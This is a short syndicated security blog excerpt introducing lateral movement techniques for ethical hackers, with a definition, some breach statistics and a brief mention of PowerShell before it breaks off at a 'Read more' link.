Ethical hacking: Lateral movement techniques

Introduction

Those with at least an introductory-level understanding of hacking techniques are aware of how much hackers can rely on lateral movement techniques to perform their deeds in the computer systems of others. But what exactly are lateral movement techniques, you may be asking? 

This article will detail some of the most popular lateral movement techniques used by adversaries. Ethical hackers should study these techniques so they can better test their own organization’s network against said attacks. For those wanting a solid look at common lateral movement techniques, this article is for you.

A little about lateral movements

To provide a quick definition here, lateral movements are used by cybercriminals to move throughout a network systematically to search for sensitive date or assets to perform data exfiltration. 

Did you know that on average, it takes seven months before data breaches are discovered? And of these breaches, only 4% are actually investigated? 

Or how about this: 80% of the time an attack is underway, it is performing lateral movements? This is because most of the time attackers are in systems blind and have to move slowly to minimize detection. Just imagine all of the potential data exfiltration, among other damage, that hackers can cause during this time. It is enough to make you lose sleep for those who are security-minded. 

PowerShell

PowerShell is the number one mechanism by which to implement lateral movement techniques. PowerShell uses object-oriented scripting that makes stealing credentials, system configuration modification and automation of movement from system to system as easy as it is legal to own. (Funny how some of the most easily accessible tools used attack techniques, including lateral movement.)

This is a tool and not a technique, technically, but it is definitely worth a mention based on its overrepresentation. (Read more...)

*** This is a Security Bloggers Network syndicated blog from Infosec Resources authored by Greg Belding. Read the original post at: http://feedproxy.google.com/~r/infosecResources/~3/sdLg7hT44bw/